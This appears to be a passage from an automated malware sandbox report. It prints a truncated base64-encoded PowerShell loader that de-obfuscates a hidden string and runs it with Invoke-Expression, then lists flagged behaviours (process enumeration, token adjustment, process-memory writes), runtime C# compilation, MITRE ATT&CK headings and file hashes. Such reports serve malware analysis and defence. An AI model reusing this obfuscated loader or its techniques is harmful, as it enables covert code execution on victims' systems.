8AcgBmAHIALgBVAGEAbgBzAHYAQwBzAGwAdQBnAHQAbwBTAGEAbABtAG8AbgBhAGUAcgBvAGQAdgBGAGEAcgBtAGEAZQBIAHUAbQBhAG4AcgBHAHIAeQBkAGUAdABTAHAAYQByAGUAXQBUAGEAbABvAG0AOgBTAGUAcABhAHIAOgBTAHkAbAB0AGUARgBEAGUAYwBvAG0AcgBzAHQAZQByAGUAbwBIAGUAbQBhAHQAbQBQAGkAcwB0AG8AQgBMAG4AZABzAHQAYQBGAHIAZQBrAHYAcwBBAG4AYQBsAHkAZQBiAGkAdABjAGgANgBtAG8AbgBvAGcANABKAGUAbABsAGYAUwBQAHIAaQB2AGEAdABDAG8AYwBjAG8AcgBTAGUAcgB2AGkAaQBGAG8AcgBjAGEAbgB5AGEAcgBkAGUAZwBIAGEAbAB2AHQAKABEAGEAbABtAG8AJABLAHUAdgBzAGUATQBGAGkAbABtAGEAeQBQAHIAZQBwAG8AdAB2AGUAcwBwAGUAbwBQAGgAbwB0AG8AKQAKAHQAYQByAGgAZQBbAEMAZQBsAGUAcwBTAGIAZQBzAHAAYQB5AFAAYQByAGwAYQBzAHMAaQBnAGgAdAB0AEMAaABhAGsAbwBlAGYAbwBkAGcAbgBtAEcAcgBlAG4AcwAuAFMAbwB1AG4AZABSAE8AbQByAGUAZAB1AGIAYQBjAGsAdABuAEgAZQBtAGEAdAB0AEkAZAB5AGwAbABpAFAAZQByAGkAZgBtAFQAcgBpAGMAawBlAFQAZQByAGUAYgAuAEQAZQB0AGEAYwBJAGsAdgByAHUAbABuAEEAZgBmAGEAbAB0AEYAaQByAGUAZgBlAFMAeQBsAHQAZQByAEcAcgBhAG0AYQBvAEMAaABvAG8AcgBwAFIAZQBjAGgAYQBTAEoAdQBkAGkAZQBlAFUAZABhAGQAbAByAEYAagBvAHIAdAB2AEUAbgBjAGgAZQBpAFMAdQByAHIAbwBjAFIAZQBwAGUAYQBlAEoAdQBzAHQAaQBzAEcAdQBkAHMAZgAuAFMAbABhAGIAYgBNAEIAYQBhAGQAZQBhAEQAcgBpAGwAYQByAEUAdABoAGUAcgBzAE0AZQByAGMAdQBoAFQAbwBsAGQAYQBhAFAAcgBpAG8AcgBsAEcAbAB1AGUAaQBdAEQAcgBpAGYAdAA6AEYAbwByAHAAYQA6AFUAZAByAGEAYQBDAHUAZAB2AGkAawBvAFIAYQBrAGUAcgBwAFQAcgBpAG4AZQB5AFAAcgBvAGwAbwAoAEkAbABzAGUAYgAkAEwAdQByAHIAaQBPAEsAbwBtAHAAbABwAGsAaQBrAGsAZQBtAHMAYQB0AHkAcgBhAFQAbwBwAGsAbwBhAEcAcwB0AGUAbABsAFUAbgBzAHQAYQBiAFMAdABpAGwAcwBhAFMAZQBtAGkAcAAsAFMAbwBsAGYAaQAgAFMAZQBsAHMAawAwAFIAYQBjAGkAbgAsAFAAcgB0AGUAbgAgAFYAYQBnAHQAcwAgAFcAYQBoAGwAYwAkAFMAbABpAGQAcwBBAFMAagBhAGsAYQByAFAAaABlAG4AbwBtAEMAbwBtAHMAaABiAFMAZQByAGYAZABhAEUAbgBrAGUAbABhAE0AZwBsAGUAcgBuAEEAZgBrAG8AcgAzAEYAaQByAGMAeQAsAE8AdgBlAHIAYQAgAFUAcABiAHIAYQAkAEYAaQByAG0AYQBPAFYAYQBuAGQAbABwAFMAcABvAG4AZwBtAEIAawBrAGUAbgBhAGQAbwBzAGUAcwBhAFUAbgBpAG4AdgBsAFIAYQB0AGgAZQBiAFQAYQBlAG4AaQBhAEEAYwBlAHIAYgAuAFMAawByAHUAZQBjAEQAaQBzAHIAZQBvAEEAbgBnAGwAaQB1AEcAaABhAG4AZABuAEYAbAB5AGcAdAB0AG0AYQByAHgAaQApAFUAZAB0AG0AbgA7AAoATQBlAGwAbABlAFsARwBsAGEAbgBzAEEAVABlAHIAcgBhAHIAVABhAGMAaAB5AG0AQQBnAHIAZQBzAGIATABuAGcAZABlAGEAUwBhAHIAZABpAGEAUQB1AG8AcgB1AG4AUwBtAGEAbABwADEARwBhAHMAbwBtAF0ARQB4AGgAaQBsADoARQBsAHkAcwBpADoAQwBlAHMAdQByAEUAQgBvAGwAbABhAG4ARQB4AHQAZQBuAHUASwBhAHAAcABlAG0AQQBwAHAAZQBsAFMAQgByAG4AZQBwAHkATgBvAG4AZQByAHMAVQBkAGUAbgByAHQARQB4AHAAbwB1AGUASwBiAHMAbABhAG0ARgBvAHIAaABhAEwARQB1AHAAbABvAG8AVQBuAHAAbwBpAGMARwBpAG0AbQBlAGEAUAByAGUAbABhAGwATgBvAG4AZQBzAGUAcgBlAGQAbwBjAHMAdAByAHkAcwB0AEEAUwBvAGwAbwBsACgAQQBjAGgAZQBpACQARgBlAGwAdAB5AEEAUABpAHEAdQBlAHIARABpAGEAbABvAG0AQgBpAHMAeQBtAGIASAB5AHAAZQByAGEASABhAGwAcwBzAGEATABpAHQAbwByAG4AVABlAGsAbgBvADMAQQBnAGUAcgBzACwARgBsAHUAZQB2ACAASwBhAHQAdABlADAAUwB5AGQAYQBmACkAUgBhAHMAdABsACMACgAnAEAADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQA1ADsAIAAkAGkAIAAtAGwAdAAgACQARwBlAG4AbgBlAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQATgBpAHAAcABpAGUAIAA9ACAAJABOAGkAcABwAGkAZQAgACsAIAAkAEcAZQBuAG4AZQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEcAZQBuAG4AZQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABOAGkAcABwAGkAZQAgAD0AIAAkAE4AaQBwAHAAaQBlACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQATgBpAHAAcABpAGUADQAKAA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l2h3e0qf.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:304
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4868.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4867.tmp"
      4⤵
      PID:1712

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4868.tmp

Filesize
1KB

MD5
26f94248bb9e48d7de5f8f66513e8da9

SHA1
32796cf6f99c08c4aedca024638d331719539702

SHA256
d0828d6089dc59326a4e172d1dd58c7b35d1f73f8dcf25394639dc22921a7e0a

SHA512
9559521366a8a2dea778ae5f90a81c5f7f94a35a85ae9b935ccee28f566b83d807ed608af1c1e1bc9490ba1afc3d99a2ab8734745804bbdfcbe7eeae92e5c97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\l2h3e0qf.dll

Filesize
4KB

MD5
a40fabf004efacc60c5e573593d4a8de

SHA1
e4f7d19dc6ef707fd7be795bda25c0af5b7b024e

SHA256
13fe273fb0dac545e1bdcabf3c3f5442d811bb158cd34722d5c3dfe2b6735db8

SHA512
6c0c85a8fed3134031dcecfad9ade57f9b48cc369783973c52989f2a81c84efb8124d06b4740aae222e539917dd90d1a7bb18e24ae967a6a83687a0aa4010452

Download Submit
C:\Users\Admin\AppData\Local\Temp\l2h3e0qf.pdb

Filesize
7KB

MD5
bf706f4b5faf0788cc2c9424768b47ba

SHA1
bcd2755b7c9cf853742bd738c2e65b9a5f0907fb

SHA256
a3183dfa84f987de7000765d91c365324a65b231e5160923f222b271c3c8ea20

SHA512
c59535a11a80bda0d36c142523cd3e4ceb050413adbe7aed4990aa7d846e43fff66ac8bde1926350ae7ac6f13f4aa07e12fc5bc10741c16c27f8af81ece84a51

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC4867.tmp

Filesize
652B

MD5
dd127a93002ebcbc2607631c8a539bb2

SHA1
eaf883fcdb0e75364b99780bb4e8236c6a930453

SHA256
056c4f845fe0e8291272a9e7069d03b437568dd9403432187c9f24837dd3925d

SHA512
71b17431688a9740b247d647bd867a840a4bcac379715623972eacaf3a62d43484874ccc9d644c32ca07f40c3934489a92e392f135d3a9122c24f4a41874144c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2h3e0qf.0.cs

Filesize
749B

MD5
ae920b7bd1b381565a3e98f7512dac72

SHA1
d79428a746455a60d3bbb2a7d8e80e2a45557de5

SHA256
57dad00e7de4751c6003c10945b1533b61c958b5bef1d15e6fff23d005dfcd82

SHA512
a3dc968ea5f533788454fa2c4a65335792e5e14f1a0da6f718481e2cba354a46ae2d5f6971b903ac61d8e8ca4825f9be4aca7ba811ce4f793f91ead694cd7a60

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l2h3e0qf.cmdline

Filesize
309B

MD5
ca5e9dd5694de1c150858682f7e235eb

SHA1
f59485ad2b5b7b9348a5336ad2083e432e742cc3

SHA256
55d463015d992e09147cec1c0c97caf9d2f86444a24537bd623858dc013618c9

SHA512
9e2566ebed938c78a037c5051a4f9e800a376f62f59b3f96cd726e14ed7df3fab2da96e470323d7206e6f73f48a0c1e272bf576fb311b4ec562bf1352f0945b2

Download Submit
memory/664-58-0x0000000073F30000-0x00000000744DB000-memory.dmp

Filesize
5.7MB

Download
memory/664-56-0x0000000075D71000-0x0000000075D73000-memory.dmp

Filesize
8KB

Download
memory/664-66-0x0000000004F90000-0x0000000005090000-memory.dmp

Filesize
1024KB

Download
memory/664-67-0x0000000073F30000-0x00000000744DB000-memory.dmp

Filesize
5.7MB

Download
memory/664-68-0x0000000004F90000-0x0000000005090000-memory.dmp

Filesize
1024KB

Download
memory/1500-54-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing